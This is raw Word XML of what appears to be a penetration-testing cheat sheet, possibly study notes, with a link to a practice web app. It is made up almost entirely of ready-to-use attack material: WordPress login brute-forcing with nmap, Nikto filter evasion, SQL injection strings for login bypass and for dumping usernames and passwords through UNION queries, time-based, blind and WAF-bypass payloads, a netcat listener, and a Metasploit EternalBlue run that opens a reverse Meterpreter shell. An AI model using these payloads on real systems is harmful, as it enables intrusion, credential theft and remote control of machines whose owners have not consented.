    <w:p w14:paraId="2CB8C93C" w14:textId="78E926C3" w:rsidR="007B1649" w:rsidRPr="005B4891" w:rsidRDefault="007B1649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nmap -p 80,443 --script http-brute --script-args 'http-brute.path=/wp-login.php' &lt;target&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17FA3D41" w14:textId="77777777" w:rsidR="0010204D" w:rsidRPr="005B4891" w:rsidRDefault="0010204D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1CDA7654" w14:textId="467D6ED2" w:rsidR="00FF17BB" w:rsidRPr="005B4891" w:rsidRDefault="00FF17BB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Nikto:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534F5657" w14:textId="0F2CD894" w:rsidR="00FF17BB" w:rsidRPr="005B4891" w:rsidRDefault="00FF17BB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nikto -h http://example.com -Plugins wordpress</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33215BCD" w14:textId="77777777" w:rsidR="00FF17BB" w:rsidRPr="005B4891" w:rsidRDefault="00FF17BB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17D1F162" w14:textId="038D8707" w:rsidR="003A58B7" w:rsidRPr="005B4891" w:rsidRDefault="003A58B7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Nikto bypass firewall:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="311233B1" w14:textId="5B124634" w:rsidR="003A58B7" w:rsidRPr="005B4891" w:rsidRDefault="003A58B7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nikto -h http://example.com -useragent "Mozilla/5.0"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2359DBEB" w14:textId="77777777" w:rsidR="003A58B7" w:rsidRPr="005B4891" w:rsidRDefault="003A58B7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74FD573F" w14:textId="7C0D9B11" w:rsidR="001D1BE1" w:rsidRPr="005B4891" w:rsidRDefault="001D1BE1" w:rsidP="001D1BE1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hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidRPr="005B4891">
          <w:rPr>
            <w:rStyle w:val="Hyperkobling"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:b/>
            <w:bCs/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>https://juice-shop.herokuapp.com/#</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="681E5C68" w14:textId="61E52C0D" w:rsidR="00425AD7" w:rsidRPr="00A05553" w:rsidRDefault="00B92BE6" w:rsidP="00A05553">
      <w:pPr>
        <w:pStyle w:val="Overskrift1"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc198019362"/>
      <w:r w:rsidRPr="00A05553">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Common SQLi</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="3E1DCF91" w14:textId="42F223B4" w:rsidR="009A5495" w:rsidRPr="005B4891" w:rsidRDefault="009A5495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Auth base</w:t>
      </w:r>
      <w:r w:rsidR="005D029F" w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7680E3BE" w14:textId="68334DB9" w:rsidR="006E3604" w:rsidRPr="005B4891" w:rsidRDefault="00B445AE" w:rsidP="0057275B">
      <w:pPr>
        <w:pStyle w:val="code"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId15" w:history="1">
        <w:r w:rsidRPr="005B4891">
          <w:rPr>
            <w:rStyle w:val="Hyperkobling"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          </w:rPr>
          <w:t>martin@test.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="001E1E0D" w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> or 1=1 </w:t>
      </w:r>
      <w:r w:rsidR="00B319C4" w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C8F4CD" w14:textId="4264C896" w:rsidR="00ED5F66" w:rsidRPr="005B4891" w:rsidRDefault="00ED5F66" w:rsidP="0057275B">
      <w:pPr>
        <w:pStyle w:val="code"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId16" w:history="1">
        <w:r w:rsidRPr="005B4891">
          <w:rPr>
            <w:rStyle w:val="Hyperkobling"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          </w:rPr>
          <w:t>martin@test.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">’ or 1=1 </w:t>
      </w:r>
      <w:r w:rsidR="003946E1" w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E3C91F" w14:textId="77777777" w:rsidR="003946E1" w:rsidRPr="005B4891" w:rsidRDefault="003946E1" w:rsidP="0057275B">
      <w:pPr>
        <w:pStyle w:val="code"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>' OR '1'='1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A76AED" w14:textId="77777777" w:rsidR="003946E1" w:rsidRPr="005B4891" w:rsidRDefault="003946E1" w:rsidP="0057275B">
      <w:pPr>
        <w:pStyle w:val="code"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>" OR "1"="1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A55C5D" w14:textId="7CBDD691" w:rsidR="003946E1" w:rsidRPr="005B4891" w:rsidRDefault="003946E1" w:rsidP="0057275B">
      <w:pPr>
        <w:pStyle w:val="code"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>') OR ('1'='1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BAA392A" w14:textId="77777777" w:rsidR="00953071" w:rsidRPr="005B4891" w:rsidRDefault="00953071" w:rsidP="0057275B">
      <w:pPr>
        <w:pStyle w:val="code"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5538D780" w14:textId="526AC062" w:rsidR="00953071" w:rsidRPr="005B4891" w:rsidRDefault="00953071" w:rsidP="0057275B">
      <w:pPr>
        <w:pStyle w:val="code"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>DATABASE version:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50EBAB65" w14:textId="77777777" w:rsidR="00953071" w:rsidRPr="005B4891" w:rsidRDefault="00953071" w:rsidP="0057275B">
      <w:pPr>
        <w:pStyle w:val="code"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>' UNION SELECT @@version, NULL --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51FC4F17" w14:textId="7C1B1F0C" w:rsidR="00953071" w:rsidRPr="005B4891" w:rsidRDefault="00953071" w:rsidP="0057275B">
      <w:pPr>
        <w:pStyle w:val="code"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>" UNION SELECT @@version, NULL --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="755774F6" w14:textId="77777777" w:rsidR="00953071" w:rsidRPr="005B4891" w:rsidRDefault="00953071" w:rsidP="0057275B">
      <w:pPr>
        <w:pStyle w:val="code"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35499964" w14:textId="3C316277" w:rsidR="00953071" w:rsidRPr="005B4891" w:rsidRDefault="00953071" w:rsidP="0057275B">
      <w:pPr>
        <w:pStyle w:val="code"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>DATABASE name:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B98FEF" w14:textId="473E3B89" w:rsidR="00953071" w:rsidRPr="005B4891" w:rsidRDefault="00953071" w:rsidP="0057275B">
      <w:pPr>
        <w:pStyle w:val="code"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>' UNION SELECT database(), NULL --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DEF574F" w14:textId="77777777" w:rsidR="00953071" w:rsidRPr="005B4891" w:rsidRDefault="00953071" w:rsidP="0057275B">
      <w:pPr>
        <w:pStyle w:val="code"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="336C4983" w14:textId="3511C089" w:rsidR="00AE6299" w:rsidRPr="005B4891" w:rsidRDefault="00AE6299" w:rsidP="0057275B">
      <w:pPr>
        <w:pStyle w:val="code"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>USER information:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="715723F6" w14:textId="1F230C16" w:rsidR="00AE6299" w:rsidRPr="005B4891" w:rsidRDefault="00AE6299" w:rsidP="0057275B">
      <w:pPr>
        <w:pStyle w:val="code"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>' UNION SELECT user(), NULL --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E5D425" w14:textId="77777777" w:rsidR="00AE6299" w:rsidRPr="005B4891" w:rsidRDefault="00AE6299" w:rsidP="0057275B">
      <w:pPr>
        <w:pStyle w:val="code"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E3E67D6" w14:textId="2EA1C495" w:rsidR="00AE6299" w:rsidRPr="005B4891" w:rsidRDefault="00AE6299" w:rsidP="0057275B">
      <w:pPr>
        <w:pStyle w:val="code"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>LIST tables:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="761C1BBD" w14:textId="35A89888" w:rsidR="00AE6299" w:rsidRPr="005B4891" w:rsidRDefault="00AE6299" w:rsidP="0057275B">
      <w:pPr>
        <w:pStyle w:val="code"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>' UNION SELECT table_name FROM information_schema.tables --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18FA5BCF" w14:textId="77777777" w:rsidR="00AE6299" w:rsidRPr="005B4891" w:rsidRDefault="00AE6299" w:rsidP="0057275B">
      <w:pPr>
        <w:pStyle w:val="code"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4ECA039A" w14:textId="77777777" w:rsidR="00132DA5" w:rsidRPr="005B4891" w:rsidRDefault="00132DA5" w:rsidP="0057275B">
      <w:pPr>
        <w:pStyle w:val="code"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15AF4B07" w14:textId="2C6629BB" w:rsidR="00132DA5" w:rsidRPr="005B4891" w:rsidRDefault="00132DA5" w:rsidP="0057275B">
      <w:pPr>
        <w:pStyle w:val="code"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>LIST column names:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="087EB89C" w14:textId="070170E9" w:rsidR="00132DA5" w:rsidRPr="005B4891" w:rsidRDefault="00132DA5" w:rsidP="0057275B">
      <w:pPr>
        <w:pStyle w:val="code"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>' UNION SELECT column_name FROM information_schema.columns WHERE table_name='users' --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568A1C4D" w14:textId="5559F61F" w:rsidR="00132DA5" w:rsidRPr="005B4891" w:rsidRDefault="00132DA5" w:rsidP="0057275B">
      <w:pPr>
        <w:pStyle w:val="code"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>USER credentials:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E45953" w14:textId="5DA9C66A" w:rsidR="00132DA5" w:rsidRPr="005B4891" w:rsidRDefault="00132DA5" w:rsidP="0057275B">
      <w:pPr>
        <w:pStyle w:val="code"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>' UNION SELECT username, password FROM users --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D82CAF5" w14:textId="77777777" w:rsidR="00132DA5" w:rsidRDefault="00132DA5" w:rsidP="00ED5F66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0737BE59" w14:textId="77777777" w:rsidR="00A05553" w:rsidRPr="005B4891" w:rsidRDefault="00A05553" w:rsidP="00ED5F66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2FBFCF6C" w14:textId="57F27C3F" w:rsidR="006059F5" w:rsidRPr="005B4891" w:rsidRDefault="006059F5" w:rsidP="00ED5F66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lastRenderedPageBreak/>
        <w:t>TIME base:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5846CE14" w14:textId="6752315B" w:rsidR="006059F5" w:rsidRPr="005B4891" w:rsidRDefault="006059F5" w:rsidP="0057275B">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r w:rsidRPr="005B4891">
        <w:t>' OR IF(1=1, SLEEP(5), 0) --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AFEDC03" w14:textId="77777777" w:rsidR="00132DA5" w:rsidRPr="005B4891" w:rsidRDefault="00132DA5" w:rsidP="0057275B">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AE6F8B4" w14:textId="7DB1044C" w:rsidR="00887FBD" w:rsidRPr="005B4891" w:rsidRDefault="009A5495" w:rsidP="0057275B">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r w:rsidRPr="005B4891">
        <w:t>Error base:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69CF4F70" w14:textId="77777777" w:rsidR="005D029F" w:rsidRPr="005B4891" w:rsidRDefault="005D029F" w:rsidP="0057275B">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08022B32" w14:textId="2C0C8563" w:rsidR="009A5495" w:rsidRPr="005B4891" w:rsidRDefault="005D029F" w:rsidP="0057275B">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r w:rsidRPr="005B4891">
        <w:t>Blind base:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE50423" w14:textId="54431D85" w:rsidR="006059F5" w:rsidRPr="005B4891" w:rsidRDefault="006059F5" w:rsidP="0057275B">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r w:rsidRPr="005B4891">
        <w:t xml:space="preserve">' AND 1=1 -- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453AE25F" w14:textId="1824BBBE" w:rsidR="005D029F" w:rsidRPr="005B4891" w:rsidRDefault="006059F5" w:rsidP="0057275B">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r w:rsidRPr="005B4891">
        <w:t xml:space="preserve">' AND 1=2 -- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="214CBE14" w14:textId="77777777" w:rsidR="006059F5" w:rsidRPr="005B4891" w:rsidRDefault="006059F5" w:rsidP="0057275B">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F2E3107" w14:textId="170732A7" w:rsidR="005D029F" w:rsidRPr="005B4891" w:rsidRDefault="005D029F" w:rsidP="0057275B">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r w:rsidRPr="005B4891">
        <w:t>Union base:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51416172" w14:textId="77777777" w:rsidR="009D4CAB" w:rsidRPr="005B4891" w:rsidRDefault="009D4CAB" w:rsidP="0057275B">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="566B2AE5" w14:textId="263B941B" w:rsidR="009D4CAB" w:rsidRPr="005B4891" w:rsidRDefault="009D4CAB" w:rsidP="0057275B">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r w:rsidRPr="005B4891">
        <w:t>WAF bypass:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C29503" w14:textId="77777777" w:rsidR="009D4CAB" w:rsidRPr="005B4891" w:rsidRDefault="009D4CAB" w:rsidP="0057275B">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r w:rsidRPr="005B4891">
        <w:t>' OR '1'='1' --   (Simple)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BDB52BA" w14:textId="77777777" w:rsidR="009D4CAB" w:rsidRPr="005B4891" w:rsidRDefault="009D4CAB" w:rsidP="0057275B">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r w:rsidRPr="005B4891">
        <w:t>' OR '1'='1' #    (Using # for comments)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2801A414" w14:textId="77777777" w:rsidR="009D4CAB" w:rsidRPr="005B4891" w:rsidRDefault="009D4CAB" w:rsidP="0057275B">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r w:rsidRPr="005B4891">
        <w:t>' OR '1'='1' /*   (Using /* for multi-line comments)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62006C81" w14:textId="77777777" w:rsidR="009D4CAB" w:rsidRPr="005B4891" w:rsidRDefault="009D4CAB" w:rsidP="0057275B">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r w:rsidRPr="005B4891">
        <w:t xml:space="preserve">' OR 1=1 -- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4FE525" w14:textId="454F7784" w:rsidR="009D4CAB" w:rsidRPr="005B4891" w:rsidRDefault="009D4CAB" w:rsidP="0057275B">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r w:rsidRPr="005B4891">
        <w:t>' OR 1=CAST(1 AS INT) --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="572E4990" w14:textId="77777777" w:rsidR="00ED5F66" w:rsidRPr="005B4891" w:rsidRDefault="00ED5F66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5AB75D72" w14:textId="76B552ED" w:rsidR="0041121D" w:rsidRPr="005B4891" w:rsidRDefault="008B5D2A" w:rsidP="779B5ED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nc -</w:t>
      </w:r>
      <w:r w:rsidR="009A2951" w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>nvlp</w:t>
      </w:r>
      <w:r w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009A2951" w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B1447E" w14:textId="77777777" w:rsidR="0041121D" w:rsidRPr="005B4891" w:rsidRDefault="0041121D" w:rsidP="0041121D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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A5F653D" wp14:editId="38BBC6AD">
            <wp:extent cx="5760720" cy="1834515"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1295631790" name="Bilde 1" descr="Et bilde som inneholder tekst, skjermbilde, Fon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31790" name="Bilde 1" descr="Et bilde som inneholder tekst, skjermbilde, Font&#10;&#10;KI-generert innhold kan være feil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5150" w14:textId="2A0D0066" w:rsidR="0041121D" w:rsidRPr="005B4891" w:rsidRDefault="0041121D" w:rsidP="779B5ED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 xml:space="preserve">curl -F "file=@payload.exe" </w:t>
      </w:r>
      <w:hyperlink r:id="rId18" w:history="1">
        <w:r w:rsidRPr="005B4891">
          <w:rPr>
            <w:rStyle w:val="Hyperkobling"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:b/>
            <w:bCs/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>https://www.virustotal.com/gui/home/upload</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="28224094" w14:textId="0C8C2AB4" w:rsidR="00CE56AC" w:rsidRPr="00A05553" w:rsidRDefault="00BF32FF" w:rsidP="00E442BC">
      <w:pPr>
        <w:pStyle w:val="Overskrift1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc198019363"/>
      <w:r w:rsidRPr="00A05553">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Metasploit framework:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="225D6079" w14:textId="77777777" w:rsidR="00BF32FF" w:rsidRPr="005B4891" w:rsidRDefault="00BF32FF" w:rsidP="00701AE2">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r w:rsidRPr="005B4891">
        <w:t>msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734AD7E6" w14:textId="77777777" w:rsidR="00BF32FF" w:rsidRPr="005B4891" w:rsidRDefault="00BF32FF" w:rsidP="00701AE2">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r w:rsidRPr="005B4891">
        <w:t>use exploit/windows/smb/ms17_010_eternalblue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19497982" w14:textId="77777777" w:rsidR="00BF32FF" w:rsidRPr="005B4891" w:rsidRDefault="00BF32FF" w:rsidP="00701AE2">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r w:rsidRPr="005B4891">
        <w:t>set payload windows/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C739E2" w14:textId="77777777" w:rsidR="00BF32FF" w:rsidRPr="005B4891" w:rsidRDefault="00BF32FF" w:rsidP="00701AE2">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r w:rsidRPr="005B4891">
        <w:t>set LHOST 192.168.1.100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20045BC9" w14:textId="77777777" w:rsidR="00BF32FF" w:rsidRPr="005B4891" w:rsidRDefault="00BF32FF" w:rsidP="00701AE2">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r w:rsidRPr="005B4891">
        <w:t>set LPORT 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="075F6A20" w14:textId="3EBDC027" w:rsidR="00BF32FF" w:rsidRPr="005B4891" w:rsidRDefault="00BF32FF" w:rsidP="00701AE2">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r w:rsidRPr="005B4891">
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503091B6" w14:textId="025DB2F5" w:rsidR="00BF32FF" w:rsidRPr="005B4891" w:rsidRDefault="00BF32FF" w:rsidP="00701AE2">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r w:rsidRPr="005B4891">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00A350A3" w:rsidRPr="005B4891">
        <w:t>Search smbghost</w:t>
      </w:r>
      <w:r w:rsidRPr="005B4891">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="004804DE" w:rsidRPr="005B4891">
        <w:t>Search printnightmare</w:t>
      </w:r>
      <w:r w:rsidRPr="005B4891">
        <w:t>)</w:t>
      </w:r>
    </w:p>
